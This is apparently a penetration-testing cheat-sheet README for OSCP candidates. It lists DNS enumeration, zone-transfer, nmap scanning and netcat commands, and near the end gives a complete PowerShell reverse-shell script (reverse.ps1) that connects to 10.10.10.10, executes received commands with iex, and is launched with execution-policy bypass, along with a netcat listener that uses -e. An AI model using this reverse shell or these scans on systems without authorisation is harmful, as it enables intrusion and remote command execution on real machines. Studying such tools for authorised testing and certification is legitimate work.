This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Resolve a given hostname to the corresponding IP.
nslookup targetorganization.com
nslookup -type=PTR IP_address
nslookup -type=MX domain
nslookup
server domain.com
ls -d domain.com
host -t ns(Name Server) < domain >
host -t ns domain.com
after that test nameservers
host -l < domain > < nameserver >
host -l domain.com ns2.domain.com
nmap -F --dns-server <dns server ip> <target ip range>
dnsenum targetdomain.com
dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com
dnsmap targetdomain.com -w <Wordlst file.txt>
Brute Force, the file is saved in /tmp
dnsmap targetdomain.com -r
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
fierce -dns targetdomain.com
hostmap.rb -only-passive -t <IP>
We can use -with-zonetransfer or -bruteforce-level
- https://dnsdumpster.com/
- https://network-tools.com/nslook/
- https://www.dnsqueries.com/en/
- https://mxtoolbox.com/
Set the ip address as a varible
export ip=192.168.1.100
export netw=192.168.1.0/24
Only Ip's
nmap -sn -n $netw | grep for | cut -d" " -f5
nmap -sS $ip
Only Open Ports and Banner Grab
nmap -n -Pn -sS $ip --open -sV
Stealth scan using FIN Scan
map -sF $ip
Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports
nmap -n -Pn -sS -A $ip --open -p-
Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services
nmap –v –sS –A –T4 $ip
nmap -O $ip
nmap -T4 -F $netw
nmap -sV -T4 -O -F --version-light $netw
nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip
nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw
ls /usr/share/nmap/scripts/ | grep ftp
One port
nc -nvz 192.168.1.23 80
Port Range
nc -vnz 192.168.1.23 0-1000
- Server
nc -lvp 1234 > file_name_to_save
- Client
nc -vn 192.168.1.33 1234 < file_to_send
- Server
nc -lvp 1234 -e ping.sh <IP>
- Client
nc -vn 192.168.1.33 1234
- Server
ncat -nlvp 8000 --ssl
- Client
ncat -nv 192.168.1.33 8000
nc target port
HTTP_Verb path http/version
Host: url
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br
penssl s_client -quiet www.bla.com.br:443
Create a simple powershell script called reverse.ps1:
function reverse_powershell {
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}
powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"
- Wordlists
- Default Password
- Leak
- Tables